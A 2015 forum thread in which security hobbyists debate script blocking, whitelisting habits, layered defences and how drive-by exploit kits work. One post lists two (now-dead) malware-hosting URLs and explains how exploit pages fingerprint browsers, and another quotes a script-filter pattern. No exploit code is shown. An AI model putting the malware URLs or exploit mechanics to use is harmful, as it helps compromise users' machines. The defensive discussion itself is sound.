Food for thought: safe browsing and blocking scripts

Discussion in 'other anti-malware software' started by Windows_Security, Feb 10, 2015.

  1. zakazak

    zakazak Registered Member

    Joined:
    Sep 20, 2010
    Posts:
    529
    Hmm weird I am using uMatrix in chrome but I had to add a lot (if not all) domains manually. E.g. youtube, amazon, paypal,... Maybe I added too many hostlists ?

    Btw is uBlock even usefull when you already block everything with uMatrix? :D
     
  2. Gullible Jones

    Gullible Jones Registered Member

    Joined:
    May 16, 2013
    Posts:
    1,466
    IIRC I mistyped a URL and was redirected. I don't recall many details, it was a while back.

    I don't think it was a failure of Noscript, more just something that Noscript was not designed to deal with. Hard to say, as I still don't know the mechanism.
     
  3. noone_particular

    noone_particular Registered Member

    Joined:
    Aug 8, 2008
    Posts:
    3,798
    Except for the premade blocklists, that sounds very similar to the ProxBlox merge for Proxomitron.
    [​IMG]
    The global/domain-specific/site-specific you mention match the Host/Subdomain/Path options of ProxBlox. In addition, the sources of external scripts are listed separately and can be allowed individually on a per-site basis.
     
  4. bo elam

    bo elam Registered Member

    Joined:
    Jun 15, 2010
    Posts:
    6,147
    Location:
    Nicaragua
    I agree regarding good and bad, thats why I treat all scripts the same. Don't trust any and run then all untrusted under Sandboxie. But unlike you, I don't decide on which scripts to allow based on reputation, I allow scripts based on whats required for me to be able to do what I want in the sites I visit.

    Bo
     
  5. noone_particular

    noone_particular Registered Member

    Joined:
    Aug 8, 2008
    Posts:
    3,798
    Why is it that controlling scripts, 3rd party connections, removing ads, trackers, and unwanted content like that Facelessbook "Like" button is called breaking the internet? As long as you can access the content you're after, it's not broken. IMO, getting the garbage off of the page is fixing the internet, not breaking it.
     
  6. I did not post that. I said in case of a problem I just allow third party and trust my other security mechanisms.

    As soon as you allow a script with Noscript you trust it. Those allowed scripts are hosted elsewhere. The ones you allow today could be misused tomorrow. Noscript does not protect you against that. You are falling back to sandboxie to protect you (which is a wise precaution since you are using Firefox).
     
    Last edited by a moderator: Feb 11, 2015
  7. wat0114

    wat0114 Registered Member

    Joined:
    Aug 5, 2012
    Posts:
    4,069
    Location:
    Canada
    +1 :thumb:

    With uMatrix, however, you can allow scripts on a per domain basis. So I could allow, for example, googleapis for a few selected sites that may need it, but not for any others I visit that don't need it to render properly.
     
  8. bo elam

    bo elam Registered Member

    Joined:
    Jun 15, 2010
    Posts:
    6,147
    Location:
    Nicaragua
    We are doing exactly the same, the only difference is that I depend on SBIE for security and you do it with something else.
    For me, any security that I get from using NoScript, is like gravy on rice. I told you at the end of my first post the reasons why I believe NoScript is doing security, you might want to read the last paraghap of that post.

    The protection you get by using NoScript is not something that you can tell with prompts or anything like that. I gotten a few messages from NoScript about click jacking problems in some pages but other than that, NoScript is pretty quiet. I like security like that.

    I do a lot of streaming live sports games, the domains that load scripts in that type of sites are pretty nasty. Not allowing 10 out 13 to load scripts when streaming a football game has to make the user more secure. I rarely look up the sites that I untrust/blacklist but when I done it, its not rare to find that many of the sites that I black list, have hosted malware recently. I am going to send you a link for a game that I am going to be watching tonight, check it out at game time and take a look at every site that loads script there and then ask yours friend if you are more secure or not if you only allow 3 out 10/13 when you watch the game. In my case, it doesn't make much difference, I got SBIE but for people not using Sandboxie, the difference that blocking scripts does regarding security, has to be huge.

    Bo
     
  9. bo elam

    bo elam Registered Member

    Joined:
    Jun 15, 2010
    Posts:
    6,147
    Location:
    Nicaragua
    You are telling it like it is.:thumb:

    Bo
     
  10. Minimalist

    Minimalist Registered Member

    Joined:
    Jan 6, 2014
    Posts:
    14,885
    Location:
    Slovenia, EU
    I agree. Most sites are working just fine without running 3rd party scripts. If a site needs some 3rd party scripts to run correctly and I visit that site frequently, I create rules for those scripts. If same happens to some random site I just disable uMatrix for that site but don't save the rule. When Chrome is closed, rule is deleted.
     
  11. Compu KTed

    Compu KTed Registered Member

    Joined:
    Dec 18, 2013
    Posts:
    1,414
    Someone who is more familiar with NoScript's ABE user ruleset maybe can add more granularity by using this feature.
     
  12. When you allow a script to run you have white listed it. The real problem is that this script is not hosted on your computer but on someone else computer. When that other computer is intruded, next time you visit that website, your script blocker allows this (altered) script to run. So it does not matter how granular or easy to use a script blocker is.

    Also the idea of granularity or allowing 3 out 10 scripts in stead of 10 out of 10, is irrelevant when you set this out to chance of running into an zero day exploit which breaks Chrome's sandbox. When I buy a lottery ticket, I increase my chance with 100% when I buy two. Although a large relative increase , the absolute increase to win the 25 million Euro jackpot is still near zero. When your have a choice to face an execution squad or play Russion roulette, the Russian roulette option seems better. But you are not in a bullet facing situation right now. You first have to be hijacked by some terrorist group.

    Hope this explains.
     
  13. wat0114

    wat0114 Registered Member

    Joined:
    Aug 5, 2012
    Posts:
    4,069
    Location:
    Canada
    That's a good point you present, kees. This has me thinking about drive-by downloads, because they are a threat that utilizes js, afaik. The potential victim lands on a compromised site, and then, typically I believe, a malicious iframe re-directs the potential victim to a 3rd party malicious site, that, correct me if I'm wrong, utilizes js to launch an exploit kit which fingerprints the potential victim's browser and plug-ns and O/S it's running on. If said potential victim has not yet allowed scripts from the 3rd party malicious site, how can the exploit kit successfully compromise the target machine?
     
  14. MisterB

    MisterB Registered Member

    Joined:
    May 31, 2013
    Posts:
    1,267
    Location:
    Southern Rocky Mountains USA
    Breaking bloated websites is not breaking the internet. People confuse the web with the internet because their only experience of it is though a web browser. By blocking ads, scripts, trackers and so on, you are breaking the corporate control of the internet and reasserting your own sovereignty over your computer and internet connection as well as your personal privacy. Hardly breaking the internet.

    Script blocking is one of the best security practices but it works best in conjunction with other good practices. I much prefer the control over what comes through my browser to anything that javascript provides. I've found that I prefer the way things work without it most of the time and sometimes I end up with the ability to fine tune a web page. For example, I have news.google.com whitelisted but not gstatic.com. This formats google news correctly but eliminates some annoying drop down menus. I also prefer the old style google menu so I'm delighted the Google has decided to "punish" us diehards who refuse to abandon Opera Presto by imposing it on us. I'm not breaking anything by using an outdated browser with default deny script blocking and near complete ad blocking, I'm formatting web content the way I want it, not the way Google and other large corporations want to shove it into my face.
     
  15. For this scenario that holds, that is why my friend teasingly asked whether I made exceptions. If the script is blocked, the reward would not show (say a movie). Because the user has this website in his/her exclusion list, he/she would trust the website. He/she would just wanted to see the rich content and now for some stupid reason it does not show, so you allow third party scripts and voila the script of the malicious website starts. When you don't make exclusions, your scenario holds, When you make exclusions and the functionality is broken, why would you not trust a perfectly safe website (at least it was in the past).

    Even cautious people would be inclined to give trust to something they already trusted. So using third party script blockers is good practice and holds in your scenario, WHEN the user accepts non-functioning websites. As soon as you start to adding exclusions, you are opening the gate again and all your efforts are futile ;)

    And your are suggesting that an exploit kit always leads to succes. It only leads to success when your system is unpatched or they have found a new zero-day. This was the reason why AVG Linkscanner was so effective against exploit kits in my test (even with 1.5 year old database), because the real pro's make those kits and the script kiddies use those exploit kits with insufficient knowledge to alter or obfuscate these of-the-shelf exploits.

    Linkscanner is a technology bashed by experts, but surprisingly effective in real world usage (it does not slow down browser startup/browsing), that is why I use it even while I have EMET and uMatrix on board.
     
    Last edited by a moderator: Feb 11, 2015
  16. wat0114

    wat0114 Registered Member

    Joined:
    Aug 5, 2012
    Posts:
    4,069
    Location:
    Canada
    I understand the exploit kit is successful only if it finds a vulnerable plug-in or whatever else not yet patched. Getting back to the exclusions that could allow the malicious script, even if it's in the future when it's compromised, is this not simply the re-direct, and not the 3rd party site hosting the exploit kit? I guess what I'm thinking, is who cares about the re-direct, because that's not what does the damage. Rather it's the 3rd party site hosting the exploit kit that is of concern.

    So my question in order I understand better: what kind of 3rd party site are we talking about? Is it a site we've whitelisted earlier, or is likely to be a new site we've never come across before, and therefore not whitelisted?

    Second question: what springs the exploit kit into action if we do happen to get redirected to it? Is it not some iframe of sorts that would act as the launch mechanism?

    BTW, good subject you've brought up :thumb:
     
  17. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    4,020
    Location:
    California
    Hello wat0114,

    Malware Domain Lists have those sites, and they are not likely to be sites that you have trusted. It has to be a site under the control of the criminals in order to have their malware files stored on that site. That is why the victim is redirected to such site. Here are two (both now return a 404 error):
    Code:
    bank.scarf-it-up.com/gao/maximum/law
    
    qwmlad.xyz:9290/openvpnadmin/popular
    Once you have landed on such site, it becomes a first-party site, and scripts on that site are first-party scripts (invoked from the site you are on).
    Once you have landed on such site, JavaScript analyzes your browser/operating system and chooses exploits accordingly. The Plug-in exploits I have looked at use both JavaScript, and JavaScript with i-frame. Here are two different codes for a PDF exploit.

    code1.gif

    code2.gif

    In this example, not being a trusted site, and with scripts whitelisted, Firefox displays a blank page because the script cannot execute:

    ff-cnsite.gif

    Even if a script runs, if Plug-ins are also whitelisted, the browser will return a prompt (the PDF file will not automatically open):

    ff-pdfPrompt.gif

    Java and Flash exploits will also fail. Here is the code for an old Java exploit -- the .jar file is the malware file that runs to download the malware. The script invokes the Java vulnerability.

    java_ff-2.jpg



    ----
    rich
     
  18. I am assuming white listed before, because that was my initial use case. My guess is that 9 out of 10 people would allow the invoked script (or iframe) also when it would be so smart to not display the PDF (in rich example) the user was looking for (they trusted it before, so why now change).

    Most news websites for example show rich content on other website (e.g. cnn directs to turner). After the blank page or not displaying the pdf (in this example) a user would be inclined to allow third party (since that was the remedy for displaying it the first time), there is no need to be suspicious because that is what he/she did the last time wanted to see that PDF (in the example of Rich).

    That is why I said, when user is allowing exceptions, these type of use cases will trick the user in an additonal allow of third party.
     
    Last edited by a moderator: Feb 11, 2015
  19. noone_particular

    noone_particular Registered Member

    Joined:
    Aug 8, 2008
    Posts:
    3,798
    Ones control over scripts isn't limited to allow or block. Depending on the tools used, scripts can be allowed or blocked depending on their origin, content, etc. With Request Policy, permissions can be set based on where the connections initiated by the script originate and can be specified on a per-site basis. With Proxomitron, scripts can be blocked based on their content. An example is the "Kill Nosey Javascript" filter that's part of Proxomitron's original filterset. It searches for these terms in scripts:
    Code:
    *(.(referrer|plugins|cookie|colorDepth|pixelDepth|external)|history.length)*
    Any script containing any of these terms is killed. Another filter converts iFrames into links, including hidden ones. In order for a malicious iFrame to work with this filter, the user would have to deliberately click on it.
    IMO, one shouldn't rely exclusively on script filtering, controlling connections, or sandboxing. The best approach is to layer tools that use different mechanisms, then treat it as a package. How well any individual component performs, be it NoScript, Proxomitron, Request Policy, SandBoxie, or whatever doesn't matter. It's how the complete package performs that matters. Script filtering combined with connection control is a strong combination. Running that package in a sandbox or virtual system is even better. Run all of the above on a default-deny configured system and you'll be approaching bulletproof.
     
  20. wat0114

    wat0114 Registered Member

    Joined:
    Aug 5, 2012
    Posts:
    4,069
    Location:
    Canada
    Some excellent feedback from all, thanks! As rich mentions, I do actually whitelist plugins (click to play in Chrome/Chromium). As for the sandbox, yes, I'm running Chromium in firejail on Arch linux, so although I may not feel bulletproof, I think I see that level of security on the near horizon :) I agree with noone's layered approach, for sure.

    But, again, if the user allows these 3rd parties on a per domain basis, that will reduce the chances of attack.
     
    Last edited: Feb 11, 2015
  21. MisterB

    MisterB Registered Member

    Joined:
    May 31, 2013
    Posts:
    1,267
    Location:
    Southern Rocky Mountains USA
    This is exactly the right approach. If an exploit got though the script blocker on my system, it would still have to deal with my strict LUA and file permissions. It would most likely give me an error message when it tried to access files without the necessary permission. I also use hosts files to block domains so the domain an exploit is using might not be accessible.

    Apart from layered security, I am turning towards compartmentalization these days. The computer I'm posting this on is not one I use for financial transactions, for example. I can run it a bit more relaxed than a system that does. If this system is compromised in anyway, it is a ten minute procedure to restore it and the loss is minimal. I don't have a home network set up in my router. All network connections at the LAN level are blocked and each computer and device connected to the router is an island in the internet sea. If one is compromised, it won't affect the others.
     
  22. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    4,020
    Location:
    California
    I make no assumptions about user decisions regarding prompts. That is a user problem. I show just the methodology by which the user can have several barriers in place at the gate to prevent the exploit from running automatically.

    However, in the example I gave, this is the scenario I had in mind, which is the way plug-in exploits are set up to work:
    • I go to a site, say a news site, and suddenly I'm confronted with a prompt to open/save a PDF. Now, I didn't go looking for a PDF, so I know that something is not right, so I close the browser. End of exploit.
    You offer another scenario, where, if I understand correctly, I go looking for a certain PDF file on a web site, and am redirected to a malware site which offers a PDF, and I'm going to allow the file because I shouldn't be suspicious, since I'm looking for a PDF.

    Well, I've not seen such a situation, but it would certainly be clever. However, the trickery should be uncovered, for the PDF prompt shows the URL of the page where the file is stored, and it would not be the original URL to which I navigated:

    ff-pdfPrompt2.gif

    So, if this is what you have in mind, the exploit should not succeed.

    regards,

    ----
    rich
     
  23. Rich, you just prooved that the exploit did not succeed, but the user did not get what he thought he was looking for. I am talking about user habits, since the scenario the original webbsite was intruded was discussed in post 37.

    For argument's sake Watt zoomed in on the scenario below. I do not argue that the script blocker will fail, but due to "trusting third party scripts" habit (1) and debugging habit (2) fair chance this script will be allowed by the USER.

    Uses scenario
    User goes to site X, which has (like CNN for instance) video clips which are on Site Y. So I have my scriptblocker set to allow Site X and Site Y. Now let's for arguments sake say Site X was comprimised and a script was added to Site Z. The scriptblocker would block the script of Site Z, but the news video clips would not show.

    Because you make no assumptions on user habits, the story stops here. I talked about user decisions which would be likely based on user habits/previous positive experienced as outlined below.

    (1) Trusting third party scripts habit
    When a user is used to debugging his script blocker he will look for a cure. Since he already trusted this website, the user knows that referring to partner websites is common practice in media world, so fair chance he would be off-guard and start debugging his script blocker (looking for a way to show the news clip). As clearly outlined in the conversation of post 1 (ME: No, I sometimes allow exceptions).

    (2) Debugging user habit
    Another complicating issue is when debugging a script blockers, is that sometimes you need to allow all scripts to find the ones which you need because of the cascading structure of scripts invoked (as confirmed in post 6). So in stead of hand picking one by one (when you need two scripts out seven, in a worst case scenario the 30th is successful), the user is inclined to does it by allowing all (see post 35).
     
    Last edited by a moderator: Feb 12, 2015
  24. @Rmus

    Wonder what your thoughts are about the principles about white listings, this are the ones my friend tried to make clear when pulling my leg when I said I allowed exceptions:

    1. A whitelist is a defeault deny, with a few tested (in VM) exceptions.

    2. Whitelist should be static and zero changes are best, but change as less as possible. When a user often fine tunes his white list, it sort of defeats the idea of a white list

    3. Messing with the white list when the allowed code is on someone's else computer (like with a script block) in a trial-on-error procedure, is a nightmare to any security professional, because the integrity of the system is left to ad hoc user decision.
     
  25. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    4,020
    Location:
    California
    Hello kees,

    Well, as I stated, I'm not interested in user habits. I only answered questions by wat0114 regarding how the exploits worked,and how they could be easily blocked from running automatically. If the user permits actions to continue following a prompt, that is not the fault of the browser.
    I do not use a script blocker. My Browser is Opera, and I use its built-in Site Preferences to control things.

    The pop-ups in my test above were with Firefox. I sometimes used Internet Explorer in testing sites with exploits targeting that browser. I could never get drive-by exploits to work in Opera -- I never figured out why.

    The OS is WinXP.

    ----
    rich
     
    Last edited: Feb 12, 2015
  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.